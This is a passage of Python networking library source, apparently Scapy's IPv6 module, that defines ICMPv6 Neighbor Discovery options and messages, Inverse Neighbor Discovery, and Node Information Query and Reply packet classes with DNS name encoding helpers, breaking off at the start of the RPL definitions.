1803    fields_desc = [ByteField("type", 5),
1804                   ByteField("len", 1),
1805                   XShortField("res", 0),
1806                   IntField("mtu", 1280)]
1807
1808    def mysummary(self):
1809        return self.sprintf("%name% %mtu%")
1810
1811
1812class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet):  # RFC 2491
1813    name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
1814    fields_desc = [ByteField("type", 6),
1815                   ByteField("len", 1),
1816                   ByteField("shortcutlim", 40),  # XXX
1817                   ByteField("res1", 0),
1818                   IntField("res2", 0)]
1819
1820
1821class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
1822    name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
1823    fields_desc = [ByteField("type", 7),
1824                   ByteField("len", 1),
1825                   ShortField("res", 0),
1826                   IntField("advint", 0)]
1827
1828    def mysummary(self):
1829        return self.sprintf("%name% %advint% milliseconds")
1830
1831
1832class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
1833    name = "ICMPv6 Neighbor Discovery - Home Agent Information"
1834    fields_desc = [ByteField("type", 8),
1835                   ByteField("len", 1),
1836                   ShortField("res", 0),
1837                   ShortField("pref", 0),
1838                   ShortField("lifetime", 1)]
1839
1840    def mysummary(self):
1841        return self.sprintf("%name% %pref% %lifetime% seconds")
1842
1843# type 9  : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
1844
1845# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
1846
1847
1848class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
1849    name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
1850    fields_desc = [ByteField("type", 17),
1851                   ByteField("len", 3),
1852                   ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
1853                                                2: "New Care-Of Address",
1854                                                3: "NAR's IP address"}),
1855                   ByteField("plen", 64),
1856                   IntField("res", 0),
1857                   IP6Field("addr", "::")]
1858
1859
1860class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
1861    name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"  # noqa: E501
1862    fields_desc = [ByteField("type", 18),
1863                   ByteField("len", 3),
1864                   ByteField("optcode", 0),
1865                   ByteField("plen", 64),
1866                   IntField("res", 0),
1867                   IP6Field("prefix", "::")]
1868
1869
1870_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1871                        1: "LLA for the new AP",
1872                        2: "LLA of the MN",
1873                        3: "LLA of the NAR",
1874                        4: "LLA of the src of TrSolPr or PrRtAdv msg",
1875                        5: "AP identified by LLA belongs to current iface of router",  # noqa: E501
1876                        6: "No preifx info available for AP identified by the LLA",  # noqa: E501
1877                        7: "No fast handovers support for AP identified by the LLA"}  # noqa: E501
1878
1879
1880class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet):     # RFC 4068
1881    name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"  # noqa: E501
1882    fields_desc = [ByteField("type", 19),
1883                   ByteField("len", 1),
1884                   ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
1885                   MACField("lla", ETHER_ANY)]  # We only support ethernet
1886
1887
1888class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet):     # RFC 4140
1889    name = "ICMPv6 Neighbor Discovery - MAP Option"
1890    fields_desc = [ByteField("type", 23),
1891                   ByteField("len", 3),
1892                   BitField("dist", 1, 4),
1893                   BitField("pref", 15, 4),  # highest availability
1894                   BitField("R", 1, 1),
1895                   BitField("res", 0, 7),
1896                   IntField("validlifetime", 0xffffffff),
1897                   IP6Field("addr", "::")]
1898
1899
1900class _IP6PrefixField(IP6Field):
1901    __slots__ = ["length_from"]
1902
1903    def __init__(self, name, default):
1904        IP6Field.__init__(self, name, default)
1905        self.length_from = lambda pkt: 8 * (pkt.len - 1)
1906
1907    def addfield(self, pkt, s, val):
1908        return s + self.i2m(pkt, val)
1909
1910    def getfield(self, pkt, s):
1911        tmp_len = self.length_from(pkt)
1912        p = s[:tmp_len]
1913        if tmp_len < 16:
1914            p += b'\x00' * (16 - tmp_len)
1915        return s[tmp_len:], self.m2i(pkt, p)
1916
1917    def i2len(self, pkt, x):
1918        return len(self.i2m(pkt, x))
1919
1920    def i2m(self, pkt, x):
1921        tmp_len = pkt.len
1922
1923        if x is None:
1924            x = "::"
1925            if tmp_len is None:
1926                tmp_len = 1
1927        x = inet_pton(socket.AF_INET6, x)
1928
1929        if tmp_len is None:
1930            return x
1931        if tmp_len in [0, 1]:
1932            return b""
1933        if tmp_len in [2, 3]:
1934            return x[:8 * (tmp_len - 1)]
1935
1936        return x + b'\x00' * 8 * (tmp_len - 3)
1937
1938
1939class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet):  # RFC 4191
1940    name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
1941    fields_desc = [ByteField("type", 24),
1942                   FieldLenField("len", None, length_of="prefix", fmt="B",
1943                                 adjust=lambda pkt, x: x // 8 + 1),
1944                   ByteField("plen", None),
1945                   BitField("res1", 0, 3),
1946                   BitEnumField("prf", 0, 2, icmp6ndraprefs),
1947                   BitField("res2", 0, 3),
1948                   IntField("rtlifetime", 0xffffffff),
1949                   _IP6PrefixField("prefix", None)]
1950
1951    def mysummary(self):
1952        return self.sprintf("%name% %prefix%/%plen% Preference %prf%")
1953
1954
1955class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet):  # RFC 5006
1956    name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
1957    fields_desc = [ByteField("type", 25),
1958                   FieldLenField("len", None, count_of="dns", fmt="B",
1959                                 adjust=lambda pkt, x: 2 * x + 1),
1960                   ShortField("res", None),
1961                   IntField("lifetime", 0xffffffff),
1962                   IP6ListField("dns", [],
1963                                length_from=lambda pkt: 8 * (pkt.len - 1))]
1964
1965    def mysummary(self):
1966        return self.sprintf("%name% " + ", ".join(self.dns))
1967
1968
1969class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet):  # RFC 5175 (prev. 5075)
1970    name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
1971    fields_desc = [ByteField("type", 26),
1972                   ByteField("len", 1),
1973                   BitField("res", 0, 48)]
1974
1975# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
1976# described in section 3.1 of RFC 1035
1977# XXX Label should be at most 63 octets in length : we do not enforce it
1978#     Total length of domain should be 255 : we do not enforce it either
1979
1980
1981class DomainNameListField(StrLenField):
1982    __slots__ = ["padded"]
1983    islist = 1
1984    padded_unit = 8
1985
1986    def __init__(self, name, default, length_from=None, padded=False):  # noqa: E501
1987        self.padded = padded
1988        StrLenField.__init__(self, name, default, length_from=length_from)
1989
1990    def i2len(self, pkt, x):
1991        return len(self.i2m(pkt, x))
1992
1993    def m2i(self, pkt, x):
1994        x = plain_str(x)  # Decode bytes to string
1995        res = []
1996        while x:
1997            # Get a name until \x00 is reached
1998            cur = []
1999            while x and ord(x[0]) != 0:
2000                tmp_len = ord(x[0])
2001                cur.append(x[1:tmp_len + 1])
2002                x = x[tmp_len + 1:]
2003            if self.padded:
2004                # Discard following \x00 in padded mode
2005                if len(cur):
2006                    res.append(".".join(cur) + ".")
2007            else:
2008                # Store the current name
2009                res.append(".".join(cur) + ".")
2010            if x and ord(x[0]) == 0:
2011                x = x[1:]
2012        return res
2013
2014    def i2m(self, pkt, x):
2015        def conditionalTrailingDot(z):
2016            if z and orb(z[-1]) == 0:
2017                return z
2018            return z + b'\x00'
2019        # Build the encode names
2020        tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x)  # Also encode string to bytes  # noqa: E501
2021        ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
2022
2023        # In padded mode, add some \x00 bytes
2024        if self.padded and not len(ret_string) % self.padded_unit == 0:
2025            ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit)  # noqa: E501
2026
2027        return ret_string
2028
2029
2030class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet):  # RFC 6106
2031    name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
2032    fields_desc = [ByteField("type", 31),
2033                   FieldLenField("len", None, length_of="searchlist", fmt="B",
2034                                 adjust=lambda pkt, x: 1 + x // 8),
2035                   ShortField("res", None),
2036                   IntField("lifetime", 0xffffffff),
2037                   DomainNameListField("searchlist", [],
2038                                       length_from=lambda pkt: 8 * pkt.len - 8,
2039                                       padded=True)
2040                   ]
2041
2042    def mysummary(self):
2043        return self.sprintf("%name% " + ", ".join(self.searchlist))
2044
2045# End of ICMPv6 Neighbor Discovery Options.
2046
2047
2048class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
2049    name = "ICMPv6 Neighbor Discovery - Router Solicitation"
2050    fields_desc = [ByteEnumField("type", 133, icmp6types),
2051                   ByteField("code", 0),
2052                   XShortField("cksum", None),
2053                   IntField("res", 0)]
2054    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
2055
2056
2057class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
2058    name = "ICMPv6 Neighbor Discovery - Router Advertisement"
2059    fields_desc = [ByteEnumField("type", 134, icmp6types),
2060                   ByteField("code", 0),
2061                   XShortField("cksum", None),
2062                   ByteField("chlim", 0),
2063                   BitField("M", 0, 1),
2064                   BitField("O", 0, 1),
2065                   BitField("H", 0, 1),
2066                   BitEnumField("prf", 1, 2, icmp6ndraprefs),  # RFC 4191
2067                   BitField("P", 0, 1),
2068                   BitField("res", 0, 2),
2069                   ShortField("routerlifetime", 1800),
2070                   IntField("reachabletime", 0),
2071                   IntField("retranstimer", 0)]
2072    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2073
2074    def answers(self, other):
2075        return isinstance(other, ICMPv6ND_RS)
2076
2077    def mysummary(self):
2078        return self.sprintf("%name% Lifetime %routerlifetime% "
2079                            "Hop Limit %chlim% Preference %prf% "
2080                            "Managed %M% Other %O% Home %H%")
2081
2082
2083class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2084    name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
2085    fields_desc = [ByteEnumField("type", 135, icmp6types),
2086                   ByteField("code", 0),
2087                   XShortField("cksum", None),
2088                   IntField("res", 0),
2089                   IP6Field("tgt", "::")]
2090    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2091
2092    def mysummary(self):
2093        return self.sprintf("%name% (tgt: %tgt%)")
2094
2095    def hashret(self):
2096        return bytes_encode(self.tgt) + self.payload.hashret()
2097
2098
2099class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2100    name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
2101    fields_desc = [ByteEnumField("type", 136, icmp6types),
2102                   ByteField("code", 0),
2103                   XShortField("cksum", None),
2104                   BitField("R", 1, 1),
2105                   BitField("S", 0, 1),
2106                   BitField("O", 1, 1),
2107                   XBitField("res", 0, 29),
2108                   IP6Field("tgt", "::")]
2109    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2110
2111    def mysummary(self):
2112        return self.sprintf("%name% (tgt: %tgt%)")
2113
2114    def hashret(self):
2115        return bytes_encode(self.tgt) + self.payload.hashret()
2116
2117    def answers(self, other):
2118        return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
2119
2120# associated possible options : target link-layer option, Redirected header
2121
2122
2123class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2124    name = "ICMPv6 Neighbor Discovery - Redirect"
2125    fields_desc = [ByteEnumField("type", 137, icmp6types),
2126                   ByteField("code", 0),
2127                   XShortField("cksum", None),
2128                   XIntField("res", 0),
2129                   IP6Field("tgt", "::"),
2130                   IP6Field("dst", "::")]
2131    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2132
2133
2134#                ICMPv6 Inverse Neighbor Discovery (RFC 3122)               #
2135
2136class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
2137    name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
2138    fields_desc = [ByteField("type", 9),
2139                   FieldLenField("len", None, count_of="addrlist", fmt="B",
2140                                 adjust=lambda pkt, x: 2 * x + 1),
2141                   StrFixedLenField("res", b"\x00" * 6, 6),
2142                   IP6ListField("addrlist", [],
2143                                length_from=lambda pkt: 8 * (pkt.len - 1))]
2144
2145
2146class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
2147    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
2148    type = 10
2149
2150
2151# RFC3122
2152# Options requises : source lladdr et target lladdr
2153# Autres options valides : source address list, MTU
2154# - Comme precise dans le document, il serait bien de prendre l'adresse L2
2155#   demandee dans l'option requise target lladdr et l'utiliser au niveau
2156#   de l'adresse destination ethernet si aucune adresse n'est precisee
2157# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
2158#   les options.
2159# Ether() must use the target lladdr as destination
2160class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
2161    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
2162    fields_desc = [ByteEnumField("type", 141, icmp6types),
2163                   ByteField("code", 0),
2164                   XShortField("cksum", None),
2165                   XIntField("reserved", 0)]
2166    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2167
2168# Options requises :  target lladdr, target address list
2169# Autres options valides : MTU
2170
2171
2172class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2173    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
2174    fields_desc = [ByteEnumField("type", 142, icmp6types),
2175                   ByteField("code", 0),
2176                   XShortField("cksum", None),
2177                   XIntField("reserved", 0)]
2178    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2179
2180
2181###############################################################################
2182# ICMPv6 Node Information Queries (RFC 4620)
2183###############################################################################
2184
2185# [ ] Add automatic destination address computation using computeNIGroupAddr
2186#     in IPv6 class (Scapy6 modification when integrated) if :
2187#     - it is not provided
2188#     - upper layer is ICMPv6NIQueryName() with a valid value
2189# [ ] Try to be liberal in what we accept as internal values for _explicit_
2190#     DNS elements provided by users. Any string should be considered
2191#     valid and kept like it has been provided. At the moment, i2repr() will
2192#     crash on many inputs
2193# [ ] Do the documentation
2194# [ ] Add regression tests
2195# [ ] Perform test against real machines (NOOP reply is proof of implementation).  # noqa: E501
2196# [ ] Check if there are differences between different stacks. Among *BSD,
2197#     with others.
2198# [ ] Deal with flags in a consistent way.
2199# [ ] Implement compression in names2dnsrepr() and decompresiion in
2200#     dnsrepr2names(). Should be deactivable.
2201
2202icmp6_niqtypes = {0: "NOOP",
2203                  2: "Node Name",
2204                  3: "IPv6 Address",
2205                  4: "IPv4 Address"}
2206
2207
2208class _ICMPv6NIHashret:
2209    def hashret(self):
2210        return bytes_encode(self.nonce)
2211
2212
2213class _ICMPv6NIAnswers:
2214    def answers(self, other):
2215        return self.nonce == other.nonce
2216
2217# Buggy; always returns the same value during a session
2218
2219
2220class NonceField(StrFixedLenField):
2221    def __init__(self, name, default=None):
2222        StrFixedLenField.__init__(self, name, default, 8)
2223        if default is None:
2224            self.default = self.randval()
2225
2226
2227@conf.commands.register
2228def computeNIGroupAddr(name):
2229    """Compute the NI group Address. Can take a FQDN as input parameter"""
2230    name = name.lower().split(".")[0]
2231    record = chr(len(name)) + name
2232    h = md5(record.encode("utf8"))
2233    h = h.digest()
2234    addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
2235    return addr
2236
2237
2238# Here is the deal. First, that protocol is a piece of shit. Then, we
2239# provide 4 classes for the different kinds of Requests (one for every
2240# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
2241# data field class that is made to be smart by guessing the specific
2242# type of value provided :
2243#
2244# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
2245#   if not overridden by user
2246# - IPv4 if acceptable for inet_pton(AF_INET,  ): code is set to 2,
2247#   if not overridden
2248# - Name in the other cases: code is set to 0, if not overridden by user
2249#
2250# Internal storage, is not only the value, but the a pair providing
2251# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
2252#
2253# Note : I merged getfield() and m2i(). m2i() should not be called
2254#        directly anyway. Same remark for addfield() and i2m()
2255#
2256# -- arno
2257
2258# "The type of information present in the Data field of a query is
2259#  declared by the ICMP Code, whereas the type of information in a
2260#  Reply is determined by the Qtype"
2261
2262def names2dnsrepr(x):
2263    """
2264    Take as input a list of DNS names or a single DNS name
2265    and encode it in DNS format (with possible compression)
2266    If a string that is already a DNS name in DNS format
2267    is passed, it is returned unmodified. Result is a string.
2268    !!!  At the moment, compression is not implemented  !!!
2269    """
2270
2271    if isinstance(x, bytes):
2272        if x and x[-1:] == b'\x00':  # stupid heuristic
2273            return x
2274        x = [x]
2275
2276    res = []
2277    for n in x:
2278        termin = b"\x00"
2279        if n.count(b'.') == 0:  # single-component gets one more
2280            termin += b'\x00'
2281        n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
2282        res.append(n)
2283    return b"".join(res)
2284
2285
2286def dnsrepr2names(x):
2287    """
2288    Take as input a DNS encoded string (possibly compressed)
2289    and returns a list of DNS names contained in it.
2290    If provided string is already in printable format
2291    (does not end with a null character, a one element list
2292    is returned). Result is a list.
2293    """
2294    res = []
2295    cur = b""
2296    while x:
2297        tmp_len = orb(x[0])
2298        x = x[1:]
2299        if not tmp_len:
2300            if cur and cur[-1:] == b'.':
2301                cur = cur[:-1]
2302            res.append(cur)
2303            cur = b""
2304            if x and orb(x[0]) == 0:  # single component
2305                x = x[1:]
2306            continue
2307        if tmp_len & 0xc0:  # XXX TODO : work on that -- arno
2308            raise Exception("DNS message can't be compressed at this point!")
2309        cur += x[:tmp_len] + b"."
2310        x = x[tmp_len:]
2311    return res
2312
2313
2314class NIQueryDataField(StrField):
2315    def __init__(self, name, default):
2316        StrField.__init__(self, name, default)
2317
2318    def i2h(self, pkt, x):
2319        if x is None:
2320            return x
2321        t, val = x
2322        if t == 1:
2323            val = dnsrepr2names(val)[0]
2324        return val
2325
2326    def h2i(self, pkt, x):
2327        if x is tuple and isinstance(x[0], int):
2328            return x
2329
2330        # Try IPv6
2331        try:
2332            inet_pton(socket.AF_INET6, x.decode())
2333            return (0, x.decode())
2334        except Exception:
2335            pass
2336        # Try IPv4
2337        try:
2338            inet_pton(socket.AF_INET, x.decode())
2339            return (2, x.decode())
2340        except Exception:
2341            pass
2342        # Try DNS
2343        if x is None:
2344            x = b""
2345        x = names2dnsrepr(x)
2346        return (1, x)
2347
2348    def i2repr(self, pkt, x):
2349        t, val = x
2350        if t == 1:  # DNS Name
2351            # we don't use dnsrepr2names() to deal with
2352            # possible weird data extracted info
2353            res = []
2354            while val:
2355                tmp_len = orb(val[0])
2356                val = val[1:]
2357                if tmp_len == 0:
2358                    break
2359                res.append(plain_str(val[:tmp_len]) + ".")
2360                val = val[tmp_len:]
2361            tmp = "".join(res)
2362            if tmp and tmp[-1] == '.':
2363                tmp = tmp[:-1]
2364            return tmp
2365        return repr(val)
2366
2367    def getfield(self, pkt, s):
2368        qtype = getattr(pkt, "qtype")
2369        if qtype == 0:  # NOOP
2370            return s, (0, b"")
2371        else:
2372            code = getattr(pkt, "code")
2373            if code == 0:   # IPv6 Addr
2374                return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
2375            elif code == 2:  # IPv4 Addr
2376                return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
2377            else:           # Name or Unknown
2378                return b"", (1, s)
2379
2380    def addfield(self, pkt, s, val):
2381        if ((isinstance(val, tuple) and val[1] is None) or
2382                val is None):
2383            val = (1, b"")
2384        t = val[0]
2385        if t == 1:
2386            return s + val[1]
2387        elif t == 0:
2388            return s + inet_pton(socket.AF_INET6, val[1])
2389        else:
2390            return s + inet_pton(socket.AF_INET, val[1])
2391
2392
2393class NIQueryCodeField(ByteEnumField):
2394    def i2m(self, pkt, x):
2395        if x is None:
2396            d = pkt.getfieldval("data")
2397            if d is None:
2398                return 1
2399            elif d[0] == 0:  # IPv6 address
2400                return 0
2401            elif d[0] == 1:  # Name
2402                return 1
2403            elif d[0] == 2:  # IPv4 address
2404                return 2
2405            else:
2406                return 1
2407        return x
2408
2409
2410_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
2411
2412# _niquery_flags = {  2: "All unicast addresses", 4: "IPv4 addresses",
2413#                     8: "Link-local addresses", 16: "Site-local addresses",
2414#                    32: "Global addresses" }
2415
2416# "This NI type has no defined flags and never has a Data Field". Used
2417# to know if the destination is up and implements NI protocol.
2418
2419
2420class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
2421    name = "ICMPv6 Node Information Query - NOOP Query"
2422    fields_desc = [ByteEnumField("type", 139, icmp6types),
2423                   NIQueryCodeField("code", None, _niquery_code),
2424                   XShortField("cksum", None),
2425                   ShortEnumField("qtype", 0, icmp6_niqtypes),
2426                   BitField("unused", 0, 10),
2427                   FlagsField("flags", 0, 6, "TACLSG"),
2428                   NonceField("nonce", None),
2429                   NIQueryDataField("data", None)]
2430
2431
2432class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
2433    name = "ICMPv6 Node Information Query - IPv6 Name Query"
2434    qtype = 2
2435
2436# We ask for the IPv6 address of the peer
2437
2438
2439class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
2440    name = "ICMPv6 Node Information Query - IPv6 Address Query"
2441    qtype = 3
2442    flags = 0x3E
2443
2444
2445class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
2446    name = "ICMPv6 Node Information Query - IPv4 Address Query"
2447    qtype = 4
2448
2449
2450_nireply_code = {0: "Successful Reply",
2451                 1: "Response Refusal",
2452                 3: "Unknown query type"}
2453
2454_nireply_flags = {1: "Reply set incomplete",
2455                  2: "All unicast addresses",
2456                  4: "IPv4 addresses",
2457                  8: "Link-local addresses",
2458                  16: "Site-local addresses",
2459                  32: "Global addresses"}
2460
2461# Internal repr is one of those :
2462# (0, "some string") : unknown qtype value are mapped to that one
2463# (3, [ (ttl, ip6), ... ])
2464# (4, [ (ttl, ip4), ... ])
2465# (2, [ttl, dns_names]) : dns_names is one string that contains
2466#     all the DNS names. Internally it is kept ready to be sent
2467#     (undissected). i2repr() decode it for user. This is to
2468#     make build after dissection bijective.
2469#
2470# I also merged getfield() and m2i(), and addfield() and i2m().
2471
2472
2473class NIReplyDataField(StrField):
2474
2475    def i2h(self, pkt, x):
2476        if x is None:
2477            return x
2478        t, val = x
2479        if t == 2:
2480            ttl, dnsnames = val
2481            val = [ttl] + dnsrepr2names(dnsnames)
2482        return val
2483
2484    def h2i(self, pkt, x):
2485        qtype = 0  # We will decode it as string if not
2486        # overridden through 'qtype' in pkt
2487
2488        # No user hint, let's use 'qtype' value for that purpose
2489        if not isinstance(x, tuple):
2490            if pkt is not None:
2491                qtype = pkt.qtype
2492        else:
2493            qtype = x[0]
2494            x = x[1]
2495
2496        # From that point on, x is the value (second element of the tuple)
2497
2498        if qtype == 2:  # DNS name
2499            if isinstance(x, (str, bytes)):  # listify the string
2500                x = [x]
2501            if isinstance(x, list):
2502                x = [val.encode() if isinstance(val, str) else val for val in x]  # noqa: E501
2503            if x and isinstance(x[0], six.integer_types):
2504                ttl = x[0]
2505                names = x[1:]
2506            else:
2507                ttl = 0
2508                names = x
2509            return (2, [ttl, names2dnsrepr(names)])
2510
2511        elif qtype in [3, 4]:  # IPv4 or IPv6 addr
2512            if not isinstance(x, list):
2513                x = [x]  # User directly provided an IP, instead of list
2514
2515            def fixvalue(x):
2516                # List elements are not tuples, user probably
2517                # omitted ttl value : we will use 0 instead
2518                if not isinstance(x, tuple):
2519                    x = (0, x)
2520                # Decode bytes
2521                if six.PY3 and isinstance(x[1], bytes):
2522                    x = (x[0], x[1].decode())
2523                return x
2524
2525            return (qtype, [fixvalue(d) for d in x])
2526
2527        return (qtype, x)
2528
2529    def addfield(self, pkt, s, val):
2530        t, tmp = val
2531        if tmp is None:
2532            tmp = b""
2533        if t == 2:
2534            ttl, dnsstr = tmp
2535            return s + struct.pack("!I", ttl) + dnsstr
2536        elif t == 3:
2537            return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp))  # noqa: E501
2538        elif t == 4:
2539            return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp))  # noqa: E501
2540        else:
2541            return s + tmp
2542
2543    def getfield(self, pkt, s):
2544        code = getattr(pkt, "code")
2545        if code != 0:
2546            return s, (0, b"")
2547
2548        qtype = getattr(pkt, "qtype")
2549        if qtype == 0:  # NOOP
2550            return s, (0, b"")
2551
2552        elif qtype == 2:
2553            if len(s) < 4:
2554                return s, (0, b"")
2555            ttl = struct.unpack("!I", s[:4])[0]
2556            return b"", (2, [ttl, s[4:]])
2557
2558        elif qtype == 3:  # IPv6 addresses with TTLs
2559            # XXX TODO : get the real length
2560            res = []
2561            while len(s) >= 20:  # 4 + 16
2562                ttl = struct.unpack("!I", s[:4])[0]
2563                ip = inet_ntop(socket.AF_INET6, s[4:20])
2564                res.append((ttl, ip))
2565                s = s[20:]
2566            return s, (3, res)
2567
2568        elif qtype == 4:  # IPv4 addresses with TTLs
2569            # XXX TODO : get the real length
2570            res = []
2571            while len(s) >= 8:  # 4 + 4
2572                ttl = struct.unpack("!I", s[:4])[0]
2573                ip = inet_ntop(socket.AF_INET, s[4:8])
2574                res.append((ttl, ip))
2575                s = s[8:]
2576            return s, (4, res)
2577        else:
2578            # XXX TODO : implement me and deal with real length
2579            return b"", (0, s)
2580
2581    def i2repr(self, pkt, x):
2582        if x is None:
2583            return "[]"
2584
2585        if isinstance(x, tuple) and len(x) == 2:
2586            t, val = x
2587            if t == 2:  # DNS names
2588                ttl, tmp_len = val
2589                tmp_len = dnsrepr2names(tmp_len)
2590                names_list = (plain_str(name) for name in tmp_len)
2591                return "ttl:%d %s" % (ttl, ",".join(names_list))
2592            elif t == 3 or t == 4:
2593                return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val)))  # noqa: E501
2594            return repr(val)
2595        return repr(x)  # XXX should not happen
2596
2597# By default, sent responses have code set to 0 (successful)
2598
2599
2600class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
2601    name = "ICMPv6 Node Information Reply - NOOP Reply"
2602    fields_desc = [ByteEnumField("type", 140, icmp6types),
2603                   ByteEnumField("code", 0, _nireply_code),
2604                   XShortField("cksum", None),
2605                   ShortEnumField("qtype", 0, icmp6_niqtypes),
2606                   BitField("unused", 0, 10),
2607                   FlagsField("flags", 0, 6, "TACLSG"),
2608                   NonceField("nonce", None),
2609                   NIReplyDataField("data", None)]
2610
2611
2612class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
2613    name = "ICMPv6 Node Information Reply - Node Names"
2614    qtype = 2
2615
2616
2617class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
2618    name = "ICMPv6 Node Information Reply - IPv6 addresses"
2619    qtype = 3
2620
2621
2622class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
2623    name = "ICMPv6 Node Information Reply - IPv4 addresses"
2624    qtype = 4
2625
2626
2627class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
2628    name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
2629    code = 1
2630
2631
2632class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
2633    name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
2634    code = 2
2635
2636
2637def _niquery_guesser(p):
2638    cls = conf.raw_layer
2639    type = orb(p[0])
2640    if type == 139:  # Node Info Query specific stuff
2641        if len(p) > 6:
2642            qtype, = struct.unpack("!H", p[4:6])
2643            cls = {0: ICMPv6NIQueryNOOP,
2644                   2: ICMPv6NIQueryName,
2645                   3: ICMPv6NIQueryIPv6,
2646                   4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer)
2647    elif type == 140:  # Node Info Reply specific stuff
2648        code = orb(p[1])
2649        if code == 0:
2650            if len(p) > 6:
2651                qtype, = struct.unpack("!H", p[4:6])
2652                cls = {2: ICMPv6NIReplyName,
2653                       3: ICMPv6NIReplyIPv6,
2654                       4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP)
2655        elif code == 1:
2656            cls = ICMPv6NIReplyRefuse
2657        elif code == 2:
2658            cls = ICMPv6NIReplyUnknown
2659    return cls
2660
2661
2662#############################################################################
2663#############################################################################
2664#     Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550)      #
2665#############################################################################
2666#############################################################################
2667
2668# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
2669rplcodes = {0: "DIS",
2670            1: "DIO",
2671            2: "DAO",
2672            3: "DAO-ACK",
2673            # 4: "P2P-DRO",
2674            # 5: "P2P-DRO-ACK",
2675            # 6: "Measurement",
2676            7: "DCO",
2677            8: "DCO-ACK"}
2678
2679
2680class ICMPv6RPL(_ICMPv6):   # RFC 6550
2681    name = 'RPL'
